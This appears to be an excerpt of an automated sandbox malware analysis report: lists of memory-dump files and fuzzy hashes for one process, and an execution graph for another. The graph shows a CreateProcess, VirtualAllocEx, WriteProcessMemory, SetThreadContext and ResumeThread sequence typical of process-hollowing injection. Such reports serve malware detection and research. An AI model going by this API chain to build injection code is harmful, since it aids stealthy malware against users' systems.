                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pContext
                                                                                                                                                                                                                                          • API String ID: 548886458-2046700901
                                                                                                                                                                                                                                          • Opcode ID: e94995d2e7b22b96dd88e3dd0a9ae68f34501fce2b29ed2e93f836b52a2a3ba1
                                                                                                                                                                                                                                          • Instruction ID: 12917fc9a9c04ab3dd27433323d0d0b131f2135b35162e3cd2c1b8043b9e42f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e94995d2e7b22b96dd88e3dd0a9ae68f34501fce2b29ed2e93f836b52a2a3ba1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAE0D139B00104A7CB04B7A8D849D9DB7FDDEC57107044199F511B7351DF70D905C6E0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B934FC
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pScheduler$version
                                                                                                                                                                                                                                          • API String ID: 2141394445-3154422776
                                                                                                                                                                                                                                          • Opcode ID: f46dcac06ae59145d098d7eb3cb32960d9415814b86af5150b2dca83b9a78080
                                                                                                                                                                                                                                          • Instruction ID: 4e238391463f41a3e24caab0437054e694c4c89a9ab67a757d6e00918064666d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f46dcac06ae59145d098d7eb3cb32960d9415814b86af5150b2dca83b9a78080
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1E08634444208B7CF25FA54D847FCC7BE8DB11B45F54C1F5B810312A29BB59798CA91

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:12%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:293
                                                                                                                                                                                                                                          Total number of Limit Nodes:16
                                                                                                                                                                                                                                          execution_graph 34468 4d15fb0 34469 4d1613b 34468->34469 34471 4d15fd6 34468->34471 34471->34469 34472 4d105f4 34471->34472 34473 4d16230 PostMessageW 34472->34473 34474 4d1629c 34473->34474 34474->34471 34191 125e560 34192 125e5a2 34191->34192 34193 125e5a8 GetModuleHandleW 34191->34193 34192->34193 34194 125e5d5 34193->34194 34195 9f0bab8 34208 9f0ae68 34195->34208 34199 9f0bc61 34200 9f0bafb 34202 9f0bd66 34217 9f0a514 34202->34217 34203 9f0bd7b 34204 9f0a514 3 API calls 34203->34204 34207 9f0bd8a 34204->34207 34222 9f0aea8 34208->34222 34227 9f0ae98 34208->34227 34209 9f0ae86 34209->34200 34212 9f0af28 34209->34212 34214 9f0af49 34212->34214 34213 9f0af5e 34213->34199 34213->34202 34213->34203 34214->34213 34215 9f0a3c8 DrawTextExW 34214->34215 34216 9f0afb9 34215->34216 34219 9f0a51f 34217->34219 34218 9f0bd71 34219->34218 34254 9f0c6d0 34219->34254 34260 9f0c6c1 34219->34260 34223 9f0aed9 34222->34223 34224 9f0af06 34223->34224 34226 9f0af28 DrawTextExW 34223->34226 34232 9f0af27 34223->34232 34224->34209 34226->34224 34228 9f0aed9 34227->34228 34229 9f0af06 34228->34229 34230 9f0af27 DrawTextExW 34228->34230 34231 9f0af28 DrawTextExW 34228->34231 34229->34209 34230->34229 34231->34229 34234 9f0af28 34232->34234 34233 9f0af5e 34233->34224 34234->34233 34237 9f0a3c8 34234->34237 34236 9f0afb9 34239 9f0a3d3 34237->34239 34238 9f0b349 34238->34236 34239->34238 34243 9f0b9a0 34239->34243 34246 9f0b99f 34239->34246 34240 9f0b45b 34240->34236 34250 9f0a4ec 34243->34250 34247 9f0b9a0 34246->34247 34248 9f0a4ec DrawTextExW 34247->34248 34249 9f0b9bd 34248->34249 34249->34240 34251 9f0b9d8 DrawTextExW 34250->34251 34253 9f0b9bd 34251->34253 34253->34240 34267 9f0a55c 34254->34267 34256 9f0c6f7 34256->34218 34258 9f0c720 CreateIconFromResourceEx 34259 9f0c79e 34258->34259 34259->34218 34261 9f0c6d0 34260->34261 34262 9f0a55c CreateIconFromResourceEx 34261->34262 34264 9f0c6ea 34262->34264 34263 9f0c6f7 34263->34218 34264->34263 34265 9f0c720 CreateIconFromResourceEx 34264->34265 34266 9f0c79e 34265->34266 34266->34218 34268 9f0c720 CreateIconFromResourceEx 34267->34268 34269 9f0c6ea 34268->34269 34269->34256 34269->34258 34178 9bd6591 34180 9bd6594 34178->34180 34179 9bd65f9 34180->34179 34181 9bd7b89 VirtualProtect 34180->34181 34182 9bd7b90 VirtualProtect 34180->34182 34181->34180 34182->34180 34139 1257ab0 34140 1257abb 34139->34140 34142 1257be9 34139->34142 34143 1257c0d 34142->34143 34147 1257ce8 34143->34147 34151 1257cf8 34143->34151 34149 1257cf8 34147->34149 34148 1257dfc 34148->34148 34149->34148 34155 1257898 34149->34155 34153 1257d1f 34151->34153 34152 1257dfc 34152->34152 34153->34152 34154 1257898 CreateActCtxA 34153->34154 34154->34152 34156 1258d88 CreateActCtxA 34155->34156 34158 1258e4b 34156->34158 34158->34148 34475 4d145a4 34476 4d145b6 34475->34476 34478 4d14c10 12 API calls 34476->34478 34479 4d14c20 12 API calls 34476->34479 34480 4d14c67 12 API calls 34476->34480 34477 4d145c6 34478->34477 34479->34477 34480->34477 34481 9f06888 34486 9f068c0 34481->34486 34490 9f0683b 34481->34490 34494 9f068b0 34481->34494 34482 9f068a7 34487 9f068c7 34486->34487 34498 9f068f8 34487->34498 34488 9f068ee 34488->34482 34491 9f068b5 34490->34491 34493 9f068f8 DrawTextExW 34491->34493 34492 9f068ee 34492->34482 34493->34492 34495 9f068c0 34494->34495 34497 9f068f8 DrawTextExW 34495->34497 34496 9f068ee 34496->34482 34497->34496 34499 9f06943 34498->34499 34500 9f06932 34498->34500 34501 9f069d1 34499->34501 34504 9f07030 34499->34504 34509 9f07020 34499->34509 34500->34488 34501->34488 34505 9f07058 34504->34505 34506 9f0715e 34505->34506 34514 9f0aa00 34505->34514 34519 9f0a9f1 34505->34519 34506->34500 34510 9f07031 34509->34510 34511 9f0715e 34510->34511 34512 9f0aa00 DrawTextExW 34510->34512 34513 9f0a9f1 DrawTextExW 34510->34513 34511->34500 34512->34511 34513->34511 34515 9f0aa16 34514->34515 34517 9f0ae68 DrawTextExW 34515->34517 34524 9f0ae59 34515->34524 34516 9f0aa8c 34516->34506 34517->34516 34520 9f0aa00 34519->34520 34522 9f0ae68 DrawTextExW 34520->34522 34523 9f0ae59 DrawTextExW 34520->34523 34521 9f0aa8c 34521->34506 34522->34521 34523->34521 34525 9f0ae86 34524->34525 34526 9f0aea8 DrawTextExW 34524->34526 34527 9f0ae98 DrawTextExW 34524->34527 34525->34516 34526->34525 34527->34525 34183 9bd5884 34185 9bd7b89 VirtualProtect 34183->34185 34186 9bd7b90 VirtualProtect 34183->34186 34184 9bd58b5 34185->34184 34186->34184 34274 4d1440b 34277 4d14196 34274->34277 34275 4d145c6 34276 4d14333 34277->34276 34281 4d14c10 34277->34281 34299 4d14c67 34277->34299 34316 4d14c20 34277->34316 34282 4d14bba 34281->34282 34283 4d14c13 34281->34283 34282->34275 34284 4d14c5e 34283->34284 34333 4d15093 34283->34333 34338 4d151cd 34283->34338 34346 4d156a8 34283->34346 34350 4d15289 34283->34350 34355 4d15187 34283->34355 34360 4d15243 34283->34360 34364 4d157e0 34283->34364 34372 4d154c1 34283->34372 34380 4d1521f 34283->34380 34389 4d153dd 34283->34389 34395 4d15018 34283->34395 34399 4d15559 34283->34399 34408 4d156f6 34283->34408 34412 4d15072 34283->34412 34284->34275 34300 4d14c3a 34299->34300 34301 4d14c5e 34300->34301 34302 4d15093 2 API calls 34300->34302 34303 4d15072 4 API calls 34300->34303 34304 4d156f6 2 API calls 34300->34304 34305 4d15559 4 API calls 34300->34305 34306 4d15018 2 API calls 34300->34306 34307 4d153dd 2 API calls 34300->34307 34308 4d1521f 4 API calls 34300->34308 34309 4d154c1 4 API calls 34300->34309 34310 4d157e0 4 API calls 34300->34310 34311 4d15243 2 API calls 34300->34311 34312 4d15187 2 API calls 34300->34312 34313 4d15289 2 API calls 34300->34313 34314 4d156a8 2 API calls 34300->34314 34315 4d151cd 4 API calls 34300->34315 34301->34275 34302->34301 34303->34301 34304->34301 34305->34301 34306->34301 34307->34301 34308->34301 34309->34301 34310->34301 34311->34301 34312->34301 34313->34301 34314->34301 34315->34301 34317 4d14c3a 34316->34317 34318 4d14c5e 34317->34318 34319 4d15093 2 API calls 34317->34319 34320 4d15072 4 API calls 34317->34320 34321 4d156f6 2 API calls 34317->34321 34322 4d15559 4 API calls 34317->34322 34323 4d15018 2 API calls 34317->34323 34324 4d153dd 2 API calls 34317->34324 34325 4d1521f 4 API calls 34317->34325 34326 4d154c1 4 API calls 34317->34326 34327 4d157e0 4 API calls 34317->34327 34328 4d15243 2 API calls 34317->34328 34329 4d15187 2 API calls 34317->34329 34330 4d15289 2 API calls 34317->34330 34331 4d156a8 2 API calls 34317->34331 34332 4d151cd 4 API calls 34317->34332 34318->34275 34319->34318 34320->34318 34321->34318 34322->34318 34323->34318 34324->34318 34325->34318 34326->34318 34327->34318 34328->34318 34329->34318 34330->34318 34331->34318 34332->34318 34334 4d15099 34333->34334 34420 4d13af3 34334->34420 34424 4d13af8 34334->34424 34335 4d150cb 34339 4d1507b 34338->34339 34340 4d157f4 34339->34340 34428 4d138b0 34339->34428 34432 4d138ab 34339->34432 34436 4d13960 34340->34436 34440 4d13959 34340->34440 34341 4d158d1 34348 4d13af3 WriteProcessMemory 34346->34348 34349 4d13af8 WriteProcessMemory 34346->34349 34347 4d156a7 34347->34346 34348->34347 34349->34347 34351 4d1592a 34350->34351 34444 4d13a33 34351->34444 34448 4d13a38 34351->34448 34352 4d15948 34356 4d15970 34355->34356 34452 4d13be1 34356->34452 34456 4d13be8 34356->34456 34357 4d15995 34362 4d13af3 WriteProcessMemory 34360->34362 34363 4d13af8 WriteProcessMemory 34360->34363 34361 4d15101 34362->34361 34363->34361 34366 4d1507b 34364->34366 34365 4d157f4 34368 4d13960 Wow64SetThreadContext 34365->34368 34369 4d13959 Wow64SetThreadContext 34365->34369 34366->34365 34370 4d138b0 ResumeThread 34366->34370 34371 4d138ab ResumeThread 34366->34371 34367 4d158d1 34368->34367 34369->34367 34370->34366 34371->34366 34373 4d1507b 34372->34373 34373->34372 34374 4d157f4 34373->34374 34378 4d138b0 ResumeThread 34373->34378 34379 4d138ab ResumeThread 34373->34379 34376 4d13960 Wow64SetThreadContext 34374->34376 34377 4d13959 Wow64SetThreadContext 34374->34377 34375 4d158d1 34376->34375 34377->34375 34378->34373 34379->34373 34382 4d1507b 34380->34382 34381 4d1584c 34381->34284 34382->34380 34382->34381 34383 4d157f4 34382->34383 34387 4d138b0 ResumeThread 34382->34387 34388 4d138ab ResumeThread 34382->34388 34385 4d13960 Wow64SetThreadContext 34383->34385 34386 4d13959 Wow64SetThreadContext 34383->34386 34384 4d158d1 34385->34384 34386->34384 34387->34382 34388->34382 34390 4d150aa 34389->34390 34392 4d150cb 34389->34392 34391 4d15a45 34390->34391 34393 4d13af3 WriteProcessMemory 34390->34393 34394 4d13af8 WriteProcessMemory 34390->34394 34391->34284 34393->34392 34394->34392 34460 4d13d80 34395->34460 34464 4d13d75 34395->34464 34403 4d1507b 34399->34403 34400 4d155bd 34401 4d157f4 34406 4d13960 Wow64SetThreadContext 34401->34406 34407 4d13959 Wow64SetThreadContext 34401->34407 34402 4d158d1 34403->34400 34403->34401 34404 4d138b0 ResumeThread 34403->34404 34405 4d138ab ResumeThread 34403->34405 34404->34403 34405->34403 34406->34402 34407->34402 34409 4d156a7 34408->34409 34409->34408 34410 4d13af3 WriteProcessMemory 34409->34410 34411 4d13af8 WriteProcessMemory 34409->34411 34410->34409 34411->34409 34415 4d1507b 34412->34415 34413 4d157f4 34416 4d13960 Wow64SetThreadContext 34413->34416 34417 4d13959 Wow64SetThreadContext 34413->34417 34414 4d158d1 34415->34413 34418 4d138b0 ResumeThread 34415->34418 34419 4d138ab ResumeThread 34415->34419 34416->34414 34417->34414 34418->34415 34419->34415 34421 4d13b40 WriteProcessMemory 34420->34421 34423 4d13b97 34421->34423 34423->34335 34425 4d13b40 WriteProcessMemory 34424->34425 34427 4d13b97 34425->34427 34427->34335 34429 4d138f0 ResumeThread 34428->34429 34431 4d13921 34429->34431 34431->34339 34433 4d138f0 ResumeThread 34432->34433 34435 4d13921 34433->34435 34435->34339 34437 4d139a5 Wow64SetThreadContext 34436->34437 34439 4d139ed 34437->34439 34439->34341 34441 4d139a5 Wow64SetThreadContext 34440->34441 34443 4d139ed 34441->34443 34443->34341 34445 4d13a78 VirtualAllocEx 34444->34445 34447 4d13ab5 34445->34447 34447->34352 34449 4d13a78 VirtualAllocEx 34448->34449 34451 4d13ab5 34449->34451 34451->34352 34453 4d13c33 ReadProcessMemory 34452->34453 34455 4d13c77 34453->34455 34455->34357 34457 4d13c33 ReadProcessMemory 34456->34457 34459 4d13c77 34457->34459 34459->34357 34461 4d13e09 CreateProcessA 34460->34461 34463 4d13fcb 34461->34463 34465 4d13e09 CreateProcessA 34464->34465 34467 4d13fcb 34465->34467 34159 9bd6223 34163 9bd7b89 34159->34163 34167 9bd7b90 34159->34167 34160 9bd6237 34164 9bd7b90 VirtualProtect 34163->34164 34166 9bd7c12 34164->34166 34166->34160 34168 9bd7bd8 VirtualProtect 34167->34168 34169 9bd7c12 34168->34169 34169->34160
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04D13FB6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                                                                                                          • Opcode ID: b2c194abcbf9a6d6b14c617961f1a452ff6e32bd21a54e7732f08bfb0120b406
                                                                                                                                                                                                                                          • Instruction ID: a466b7cb6d3903640906af9d1fe5c0d6e8b1099d2195fad69153c0336862d451
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2c194abcbf9a6d6b14c617961f1a452ff6e32bd21a54e7732f08bfb0120b406
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8A15D71D00219EFEB10CFA9D8817EDBBB2BF44314F1485A9EC19A7290D7749985CF91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04D13FB6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                                                                                                          • Opcode ID: d8d8fe838b33c0924c676ff3c2636b7c3d4aa12885775608cd9a06595ad7c3f9
                                                                                                                                                                                                                                          • Instruction ID: c285e6c88d2e7da7ddf14c90b77fb407fe09e39757983d5e6dbbc2140fb64b9c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8d8fe838b33c0924c676ff3c2636b7c3d4aa12885775608cd9a06595ad7c3f9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00915C71D00219EFEB10CFA9D8817ADBBB2BF48314F1485A9EC19A7250D774A985CF91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 01258E39
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2477425443.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1250000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                                                                                          • Opcode ID: b18512200955c0009cf0b9f5bb65dc9703423ebb53cce6fabb95bd171a08369c
                                                                                                                                                                                                                                          • Instruction ID: bc8930a5d6523fe6a2241244139f0d6cb813302399cca13a37106cf61bd8dbfb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b18512200955c0009cf0b9f5bb65dc9703423ebb53cce6fabb95bd171a08369c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B41F6B1C00619CBDB24DF9AC8847CDBBB5BF44714F20806AD509AB251DBB55946CF90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 01258E39
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2477425443.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1250000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                                                                                          • Opcode ID: 2f6b7d1118c7ac3bdacd9270fd6cd0335faa7e749766ea72fcecb8cd81f71b57
                                                                                                                                                                                                                                          • Instruction ID: b6579ea27713b8bc1e11dc3c07247b8cac2f4c9b650deddc4e1650da20950a27
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f6b7d1118c7ac3bdacd9270fd6cd0335faa7e749766ea72fcecb8cd81f71b57
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1641E5B0C00719CBDB24DFAAC88479DBBF5BF44704F248069E509AB255DBB55946CF90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2489646637.0000000009F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F00000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_9f00000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFromIconResource
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3668623891-0
                                                                                                                                                                                                                                          • Opcode ID: 45eab759ae67c82a8660d3ca7375a3f27d5da02415e40762b22f808500e922f9
                                                                                                                                                                                                                                          • Instruction ID: dd1ad3dc1533eb34d46ee76b6d5ebbf105fc3763b4eefefbda1f7597b7283aab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45eab759ae67c82a8660d3ca7375a3f27d5da02415e40762b22f808500e922f9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB316971900359DFCB11DFA9D844ADEBFF8EF49310F14805AE954A7261C3359960DFA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09F0B9BD,?,?), ref: 09F0BA6F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2489646637.0000000009F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F00000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_9f00000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DrawText
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2175133113-0
                                                                                                                                                                                                                                          • Opcode ID: f0a41aaf0655e2acf0e174545c59a096b4277ca3d5f3b69ca0f035c4a0eea278
                                                                                                                                                                                                                                          • Instruction ID: 28348141c95c775f87a5a25b9b8b4d8a5eefeaea83107f5cb1055931ac7478a0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0a41aaf0655e2acf0e174545c59a096b4277ca3d5f3b69ca0f035c4a0eea278
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3731E4B5D002499FDB10CF99D8846DEFFF8FB98320F14842AE919A7250D775A944CFA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,09F0B9BD,?,?), ref: 09F0BA6F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2489646637.0000000009F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F00000, based on PE: false
